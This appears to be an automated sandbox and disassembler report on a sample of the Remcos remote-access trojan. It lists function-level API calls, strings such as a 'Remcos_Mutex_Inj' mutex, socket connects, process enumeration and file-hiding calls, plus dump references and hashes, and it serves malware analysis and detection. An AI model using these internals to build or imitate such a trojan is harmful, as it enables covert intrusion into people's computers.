                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409191
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 0040919B
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 004091AF
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091BF
                                                • Process32NextW.KERNEL32(?,0000022C), ref: 004091CF
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004091EB
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F4
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409205
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409210
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409219
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409222
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004137F0), ref: 00409234
                                                • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z.MSVCP60(?), ref: 0040925B
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409264
                                                • CloseHandle.KERNEL32(?,00000002,00000000), ref: 0040926D
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004137F0), ref: 00409274
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409283
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409297
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004092A0
                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(Program Files\,00000000), ref: 004092BA
                                                • wcslen.MSVCRT ref: 004092D1
                                                • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000), ref: 004092DD
                                                • ??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z.MSVCP60(?,?), ref: 004092EE
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004092FF
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040930D
                                                • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj), ref: 0040931C
                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00409326
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00409330
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,00000001), ref: 0040934E
                                                • CloseHandle.KERNEL32(00000000), ref: 00409367
                                                  • Part of subcall function 0041167A: OpenProcess.KERNEL32(00000400,00000000,?,?,0040924B,?), ref: 00411690
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040936E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$??8std@@V?$basic_string@$G@2@@0@$HandleProcess32$??0?$basic_string@??4?$basic_string@?begin@?$basic_string@?c_str@?$basic_string@CloseCreateG@1@@ModuleNextV01@V01@@V12@$?assign@?$basic_string@?end@?$basic_string@?find@?$basic_string@?replace@?$basic_string@D@2@@std@@D@std@@FileFirstG@2@@0@0@G@2@@0@@MutexNameOpenProcessSnapshotToolhelp32V12@@wcslen
                                                • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj$)A
                                                • API String ID: 481812264-3931318087
                                                • Opcode ID: a11a9b4b5b8a7b05e95983f97ae178db721cdbe3a86937e6c4bbdf585e605e32
                                                • Instruction ID: a69f2a0f31e321f0c4876fdb0c98637c04e37c77b808a582485a8c32d10448ed
                                                • Opcode Fuzzy Hash: a11a9b4b5b8a7b05e95983f97ae178db721cdbe3a86937e6c4bbdf585e605e32
                                                • Instruction Fuzzy Hash: 3271F17250010ABFCF14EFA0DC59AEE7B78EF15356F1040BAF606A20A1DB755B89CB58
                                                Function 00408137 Relevance: 68.4, APIs: 31, Strings: 8, Instructions: 148COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408147
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040817F
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?,WinDir), ref: 004081B6
                                                • _wgetenv.MSVCRT ref: 004081C6
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004081D1
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004081DC
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004081E8
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081F1
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081FA
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408203
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?,WinDir), ref: 00408217
                                                • _wgetenv.MSVCRT ref: 00408227
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408232
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040823D
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408249
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408252
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040825B
                                                • _wgetenv.MSVCRT ref: 00408279
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00000000), ref: 00408284
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000208,00419BC8), ref: 0040829A
                                                • GetLongPathNameW.KERNEL32(00000000), ref: 004082A1
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 004082B3
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00413888,?,00000000), ref: 004082C6
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z.MSVCP60(?,00000000,?,00000000), ref: 004082DC
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004082E7
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004082F3
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004082FE
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408307
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408310
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408319
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408322
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@G@1@@$??4?$basic_string@G@2@@0@Hstd@@V01@V10@0@V?$basic_string@$V01@@_wgetenv$?c_str@?$basic_string@LongNamePath
                                                • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                • API String ID: 1999370131-1609423294
                                                • Opcode ID: e10ec81fa66f6437e980c991d2c88ce9e9cb5844b5c1d2a04ba3897fc4feb433
                                                • Instruction ID: 422c2ae3d1d39e43b5eecec687f648c42e8622a67a36d815f4917ee9b75bed2a
                                                • Opcode Fuzzy Hash: e10ec81fa66f6437e980c991d2c88ce9e9cb5844b5c1d2a04ba3897fc4feb433
                                                • Instruction Fuzzy Hash: E7517F72400109EFCF04EF90ED59DEE7B78AB14306B2041AAF516A20A5EF756B49CB69
                                                Function 00404955 Relevance: 64.9, APIs: 36, Strings: 1, Instructions: 168sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(00002710), ref: 00404975
                                                  • Part of subcall function 004048A0: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00413670,?,00419BC8,00404982), ref: 004048D0
                                                  • Part of subcall function 004048A0: CreateFileW.KERNEL32(00000000), ref: 004048D7
                                                  • Part of subcall function 004048A0: GetFileSize.KERNEL32(00000000,00000000), ref: 004048E6
                                                  • Part of subcall function 004048A0: Sleep.KERNEL32(00002710), ref: 00404915
                                                  • Part of subcall function 004048A0: CloseHandle.KERNEL32(00000000), ref: 0040491C
                                                  • Part of subcall function 004048A0: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404944
                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00413670), ref: 00404987
                                                • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 0040499C
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004049AD
                                                • CreateDirectoryW.KERNEL32(00000000), ref: 004049B4
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004049BF
                                                • GetFileAttributesW.KERNEL32(00000000), ref: 004049C6
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 004049D7
                                                • SetFileAttributesW.KERNEL32(00000000), ref: 004049DE
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 004049EF
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 004049FE
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00404A0B
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404A18
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00404A33
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00404A3E
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404A4A
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00404A5E
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 00404A65
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00404A76
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00404A82
                                                  • Part of subcall function 00411980: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,80000001,00419970,?,00409E13,?,?), ref: 0041199A
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00404A97
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 00404ABB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404AC4
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404AA1
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,0040846F,00000000), ref: 00402FD7
                                                  • Part of subcall function 00402FC1: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402FE3
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402FF8
                                                  • Part of subcall function 00402FC1: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403001
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404ACD
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00404ADD
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00404AE6
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404AF0
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 00404B08
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404B18
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404B29
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404B32
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670), ref: 00404B3F
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000013), ref: 00404B50
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000006), ref: 00404B5F
                                                • SetFileAttributesW.KERNEL32(00000000), ref: 00404B66
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$File$??0?$basic_string@$??1?$basic_string@V01@@$?length@?$basic_string@$?data@?$basic_string@AttributesCreateD@1@@V01@$??4?$basic_string@Sleep$??9std@@?empty@?$basic_string@CloseD@2@@0@DirectoryExistsHandlePathSizeV?$basic_string@Y?$basic_string@
                                                • String ID: p6A
                                                • API String ID: 3042614570-595022129
                                                • Opcode ID: 73c2a4984302e522f55480b0dba4285b315acd8f032863f958fcc54dae4d8394
                                                • Instruction ID: 56c4c9a563e503a855f4c1bf16c9e47296571518d8d3a4f87e0d102e10045e54
                                                • Opcode Fuzzy Hash: 73c2a4984302e522f55480b0dba4285b315acd8f032863f958fcc54dae4d8394
                                                • Instruction Fuzzy Hash: 2A510E75A00119AFCF04BFA4EC5DAEE7B79AB44706F0480B9F606A31E1DF349A45CB58
                                                Function 0040CB3C Relevance: 63.2, APIs: 31, Strings: 5, Instructions: 203COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,?,00000000,00000002,?,00000000), ref: 0040CB6E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,?,00000000), ref: 0040CB7E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,00000000), ref: 0040CB8E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040CB98
                                                  • Part of subcall function 004024A6: socket.WS2_32(00000000,00000001,00000006), ref: 004024B0
                                                  • Part of subcall function 004024A6: connect.WS2_32(00000000,00419298,00000010), ref: 004024BF
                                                  • Part of subcall function 004024A6: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00419288,?,00401671,00000061), ref: 004024D2
                                                  • Part of subcall function 004024A6: closesocket.WS2_32(00000000), ref: 004024EA
                                                  • Part of subcall function 004024A6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,00419298,00000010,00000000,00000001,00000006,00419288,?,00401671,00000061), ref: 004024F5
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CBB2
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CBBE
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CBCA
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                  • Part of subcall function 0041135A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,0040375E,?,?), ref: 00411369
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411373
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,0040375E,?,?), ref: 0041137C
                                                  • Part of subcall function 0041135A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411386
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411390
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,0040375E,?,?), ref: 004113A6
                                                  • Part of subcall function 0041135A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0040375E,?,?), ref: 004113AF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CBFC
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CC0E
                                                  • Part of subcall function 00410CD2: GetLocalTime.KERNEL32(?), ref: 00410CE9
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00414BC4,?,00413760,?,?,_E@,?), ref: 00410D1E
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,_E@,?), ref: 00410D2B
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,_E@,?), ref: 00410D38
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,_E@,?), ref: 00410D45
                                                  • Part of subcall function 00410CD2: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,_E@,?), ref: 00410D4F
                                                  • Part of subcall function 00410CD2: printf.MSVCRT ref: 00410D56
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D62
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D6B
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D74
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D7D
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D86
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D8F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040CC22
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040CC2E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040CC3B
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,00000000), ref: 0040CC4D
                                                • atoi.MSVCRT(00000000,?,?,?,?,?,?,?,00000000), ref: 0040CC54
                                                  • Part of subcall function 00403392: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00419278,00413670), ref: 004033B7
